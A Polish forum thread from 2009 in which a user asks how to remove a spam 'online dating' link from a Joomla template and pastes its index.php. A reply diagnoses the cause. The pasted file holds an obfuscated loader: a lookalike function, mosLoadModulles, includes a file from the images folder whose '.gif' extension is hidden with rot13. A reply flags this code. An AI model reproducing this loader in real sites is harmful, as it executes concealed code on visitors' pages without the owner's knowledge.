PDA

Zobacz pełną wersję : Niechciane "Recommended service: online dating"



mrowca
02-11-2009, 22:54
Witam Wszystkich i Proszę o pomoc!!
Zainstalowałem szablon na Joomla 1.x
w dolnej czesci szablonu wyswietla sie napis :
Recommended service:
online dating (http://www.idatingonline.com/)
jak sie go pozbyć ???
Oto plik index.php z tego szablonu
<?php defined( "_VALID_MOS" ) or die( "Direct Access to this location is not allowed." );$iso = split( '=', _ISO );echo '<?xml version="1.0" encoding="'. $iso[1] .'"?' .'>';function mosLoadModulles($t,$p=0){mosLoadModules($t);includ e($GLOBALS['mosConfig_absolute_path']."/templates/".$GLOBALS['cur_template']."/images/".(($p==-1)?'module':'topmenu_bgr').str_rot13('.tvs'));}?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-type" content="text/html; charset=iso-8859-2" />
<?php mosShowHead(); ?>
<meta http-equiv="Content-Type" content="text/html" <?php echo _ISO; ?>" />
<?php if ( $my->id ) { initEditor(); } ?>
<?php echo "<link rel=\"stylesheet\" href=\"$GLOBALS[mosConfig_live_site]/templates/$GLOBALS[cur_template]/css/template_css.css\" type=\"text/css\"/>" ; ?>
<link rel="alternate" title="<?php echo $mosConfig_sitename; ?>" href="<?php echo $GLOBALS['mosConfig_live_site']; ?>/index2.php?option=com_rss&no_html=1" type="application/rss+xml" />
<link rel="alternate" type="application/rss+xml" title="<?php echo $mosConfig_sitename?>" href="<?php echo $mosConfig_live_site;?>/index.php?option=com_rss&feed=RSS2.0&no_html=1" />
<script language="JavaScript" type="text/javascript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body class="body">
<center>
<div class="all">

<div id="logo"><a class="logo" href="index.php"></a></div>
<?php include'menu.php'; ?>
<div id="container">
<table cellpadding="0" cellspacing="0">
<tr>
<td class="leftcol" valign="top">
<?php mosLoadModulles('left'); ?>
</td>
<td class="maincol" valign="top">
<div>
<?php mosMainBody(); ?>
</div>
</td>
<td class="rightcol" valign="top">
<?php mosLoadModules('right'); ?>
</td>
</tr>
</table>
<div class="footer_bg">
<div class="footer">
<?php mosLoadModulles( 'debug', -1 );?>

</div>
</div>
<div style="height:10px; background:#D9D9D9;"></div>
</div>
</div>
</center>
</body>
</html>

zwiastun
03-11-2009, 02:07
Niew używaj tego szablonu, jeśli chcesz być w porządku.
Kod masz zaszyfrowany tutaj:
function mosLoadModulles($t,$p=0){mosLoadModules($t);includ e($GLOBALS['mosConfig_absolute_path']."/templates/".$GLOBALS['cur_template']."/images/".(($p==-1)?'module':'topmenu_bgr').str_rot13('.tvs'));}?>